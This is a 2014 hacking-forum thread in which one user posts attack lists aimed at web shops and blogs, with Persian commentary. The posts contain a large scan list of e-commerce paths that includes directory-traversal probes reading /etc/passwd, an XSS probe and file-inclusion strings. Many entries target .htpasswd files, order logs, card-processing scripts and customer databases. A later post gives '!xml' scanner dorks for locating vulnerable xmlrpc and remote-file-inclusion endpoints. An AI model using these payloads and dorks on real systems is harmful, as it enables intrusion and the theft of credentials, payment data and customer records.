#/cgi-bin/shop/pgp_encrypt/process.cgi
#/cgi-bin/shop/pgp_encrypt/store_admin.cgi
#/cgi-bin/shop/pgp_encrypt/store_params.cgi
#/cgi-bin/shop/pgp_encrypt/validate_card.pm
#/cgi-bin/shop/shop/
#/cgi-bin/shop/smart.cfg
#/cgi-bin/shop/track.db
#/cgi-bin/shopadmin.asp
#/cgi-bin/shopper
#/cgi-bin/shopper.cgi
#/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
#/cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG
#/cgi-bin/shopper.cgi?
#/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
#/cgi-bin/shopper.cgi?newpage=../../../etc/passwd
#/cgi-bin/shopper.cgi?search=action&keywords=HACK&template=o rder.log
#/cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template =order.log
#/cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template =order1.log
#/cgi-bin/shopper.exe:23:

amirmahmood
07-16-2014, 06:00 PM
#/shopping/secure/
#/shopping/secure/orders/
#/shopping/shop.mdb
#/shopping/shopadmin_login.htm
#/shopping/shopdbtest.asp
#/shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('te st')</script>","<script>alert('test')</script>
#/shopping/shopping.mdb
#/shopping/shopping200.mdb
#/shopping/shopping300.mdb
#/shopping/shopping400.mdb
#/shopping/shopping450.mdb
#/shopping/shopping500.mdb
#/shopping/shopsearch.asp
#/shopping/vars.txt
#/shopping/ws%5fftp.ini
#/shopping/ws_%66tp.ini
#/shopping/ws_f%74p.ini
#/shopping/ws_ft%70.ini
#/shopping/ws_ftp%2eini
#/shopping/ws_ftp.%69ni
#/shopping/ws_ftp.i%6ei
#/shopping/ws_ftp.in%69
#/shopping/ws_ftp.ini
#/shopping/ws_ftp.log
#/shopping200.mdb
#/shopping300.mdb
#/shopping400.mdb
#/shopping450.mdb
#/shopping500.mdb
#/shopping_cart
#/shopping_cart/
#/shopping_cart/0%20WEB%20CATEGORIES
#/shopping_cart/WS_FTP.LOG
#/shopping_cart/admin/
#/shopping_cart/admin/WS_FTP.LOG
#/shopping_cart/admin/category_detail.php
#/shopping_cart/admin/config.inc.php
#/shopping_cart/admin/db.sql
#/shopping_cart/admin/detail.php
#/shopping_cart/admin/footer.php
#/shopping_cart/admin/graphics/
#/shopping_cart/admin/header.php
#/shopping_cart/admin/index.php
#/shopping_cart/admin/jscript/
#/shopping_cart/admin/list_categories.php
#/shopping_cart/admin/mysql.info.php
#/shopping_cart/backlink.js
#/shopping_cart/checkout.php
#/shopping_cart/checkoutdb.php
#/shopping_cart/config.inc.php
#/shopping_cart/configure.php
#/shoppingdirectory/midicart.mdb
#/shoppping/administrador.asp
#/shoppping/secure/orders.secure
#/shoppping/tables.sql
#/shopsearch.asp
#/show_cart.inc.php
#/store
#/store*
#/store.mdb
#/store/
#/store/./
#/store/./WEB-INF/
#/store/./WEB-INF/ShopTags.tld
#/store/./WEB-INF/classes/
#/store/./WEB-INF/lib/
#/store/./WEB-INF/web.xml
#/store//DCShop/dcshop_admin.cgi
#/store/?open
#/store/Admin_files/
#/store/Admin_files/_vti_cnf/form_results.txt
#/store/Admin_files/_vti_cnf/order.log
#/store/Admin_files/myorderlog.txt
#/store/Admin_files/order.log
#/store/Admin_files/orders.txt
#/store/WEB-INF/
#/store/WEB-INF/ShopTags.tld
#/store/WEB-INF/classes/
#/store/WEB-INF/lib/
#/store/WEB-INF/web.xml
#/store/WSFTP.LOG
#/store/WS_FTP.INI
#/store/WS_FTP.LOG
#/store/WS_FTP.LOG/?open
#/store/WS_FTP.LOG?open
#/store/WS_FTP.ini
#/store/WS_fTP.log
#/store/Web.Config
#/store/_vti_cnf/form_results.htm
#/store/_vti_cnf/form_results.html
#/store/_vti_cnf/form_results.txt
#/store/_vti_cnf/order.log
#/store/_vti_cnf/order.txt
#/store/admin
#/store/admin.dat
#/store/admin.pass
#/store/admin.passwd
#/store/admin/
#/store/admin/admin.dat
#/store/admin/default.asp
#/store/admin_files/
#/store/admin_files/_vti_cnf/
#/store/admin_files/_vti_cnf/form_results.txt
#/store/admin_files/order.log
#/store/agora.cgi
#/store/cart.cgi
#/store/cart.pl
#/store/cartmanager.cgi
#/store/category1.tpl
#/store/client.eml
#/store/comersus.mdb
#/store/comersus/comersus.mdb
#/store/comersus/database/comersus.mdb
#/store/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
#/store/compatible.cgi
#/store/create.jsp
#/store/customers/
#/store/database.dat
#/store/database.db
#/store/database.nsf
#/store/database.sql
#/store/database/comersus.mdb
#/store/database/sql
#/store/daten/
#/store/db.xml
#/store/db/
#/store/db/database.mdb
#/store/db/store.mdb
#/store/dcshop_admin.cgi
#/store/docreate.jsp
#/store/dologin.jsp
#/store/dosearch.jsp
#/store/entry.dat
#/store/idbC.dat
#/store/index.cgi?page=../../../../../../../../etc/passwd
#/store/index.js0x70
#/store/info.xml
#/store/lib.inc
#/store/lib.inc.php
#/store/lists.csv
#/store/log_files/
#/store/order.log
#/store/order.sql
#/store/orderdetalis.aspx
#/store/orders
#/store/orders.log
#/store/orders.mdb
#/store/orders.sql
#/store/pgp_encrypt/cc_store_lib.pm
#/store/pgp_encrypt/order_admin.cgi
#/store/pgp_encrypt/pgp_lib.pm
#/store/pgp_encrypt/print_invoice.cgi
#/store/pgp_encrypt/process.cgi
#/store/pgp_encrypt/store_admin.cgi
#/store/pgp_encrypt/store_params.cgi
#/store/pgp_encrypt/validate_card.pm
#/store/quikstore.cgi?store='
#/store/secure/
#/store/show_cart.inc.php
#/store/stats.php
#/store/store.dat
#/store/store.db
#/store/store.log
#/store/store.mdb
#/store/store.nsf
#/store/store.sql
#/store/storeadmin
#/store/storeadmin/
#/store/temp_customers/
#/store/temp_orders/
#/store/test.log
#/store/vars.txt
#/store/web.xml
#/store/ws%5fftp.ini
#/store/ws_%66tp.ini
#/store/ws_f%74p.ini
#/store/ws_ft%70.ini
#/store/ws_ftp%2eini
#/store/ws_ftp.%69ni
#/store/ws_ftp.i%6ei
#/store/ws_ftp.in%69
#/store/ws_ftp.ini
#/store/ws_ftp.log
#/storeadmin
#/storeadmin/
#/storefront.mdb
#/storefrontpro50.tem/
#/storemgr/
#/stores/
#/stores/registry.dat
#/usersorder/
#/usersorders/
#/virtuastore.mdb
#/virtuastore/
#/virtuastore/database/virtuastore.mdb
#/web_store.cgi
#/webcart
#/webcart-lite
#/webcart-lite/
#/webcart-lite/config/clients.txt
#/webcart-lite/config/import.txt
#/webcart-lite/orders/import.txt
#/webcart/
#/webcart/carts
#/webcart/carts/
#/webcart/config/
#/webcart/config/clients.txt
#/webcart/orders/
#/webcart/orders/carts/.txt
#/webcart/orders/import.txt
#/webcash
#/webcash/
#/webcash/.dbusers.db
#/webcash/.htaccess
#/webcash/.htlilyfire
#/webcash/.htpass-4.new
#/webcash/.htpasswd
#/webcash/.htpasswd.aknk
#/webcash/.htpasswd.nten
#/webcash/.htpasswd.slez
#/webcash/.htusers
#/webcash/.passwrd
#/webcash/.pwd
#/webcash/_privat/.htpasswd
#/webcash/access/.htpasswd
#/webcash/acctman/info/.htpasswd
#/webcash/admin/db/htpasswd
#/webcash/ats/logs/writeto.txt
#/webcash/ccbill/.htpasswd
#/webcash/ccbill/members/.htpasswd
#/webcash/ccbill/password/.htpasswd
#/webcash/ccbill/secure/ccbill.log
#/webcash/cgi-bin/am/codes/htpasswd
#/webcash/cgi-bin/database/passwords
#/webcash/cgi-bin/ib/data/htpasswd
#/webcash/cgi-bin/mastergate/passwords
#/webcash/cgi-bin/passwd/.htpasswd
#/webcash/cgi-bin/passwords
#/webcash/cgi-bin/test.cgi
#/webcash/cgi-bin2/ampro/info/.htpasswd
#/webcash/cgibin/.htpasswd
#/webcash/cgibin/ibp5/passwords.temp
#/webcash/cgibin/mastergate/passwords
#/webcash/cgibin/members/htdata/.htpasswd
#/webcash/cgibin/passwords
#/webcash/client.log
#/webcash/cohfmembers/.htpasswd
#/webcash/crontab.txt
#/webcash/data/passwdfile
#/webcash/database/.pnppasswd
#/webcash/deep/.htpasswd
#/webcash/dmr/.htpasswd.***
#/webcash/drowssap/.htpasswd
#/webcash/expire.txt
#/webcash/htusers
#/webstore/
#/webstore/Admin_files/
#/webstore/addcustomer.php
#/webstore/admin/addcustomer.php
#/xcart/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
#/xdatabase/MFIIstore.ldb
#/xdatabase/MFIIstore.mdb
#/xshop.mdb
#/~authorizenet.cgi
#/~cgi-bin/authorizenet.cgi/
#/~webcash
#/~webcash/

amirmahmood
07-16-2014, 07:03 PM
سلام./
دوستان امروز به دلیل ارتقا گرفتنم و وارد شدن به یه رنک جدید براتون دورک های پرایویت rfi رو گذاشتم./

این دورک ها رو به سختی تمام پیدا کردم./


دیگه مثل پست های قبلیم واستون تو تگ کد نمیزارم پیوست کردم./

این سری از دورک هاش تو انجمن گشتم نبود./
اگر هم بود به بزرگی خودتون ببخشید./

amirmahmood
07-16-2014, 07:15 PM
فکر نکنم تو انجمن دورکی در مورد xml گذاشته باشن میزارم با هاش کار کنید

!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182

!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182

!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it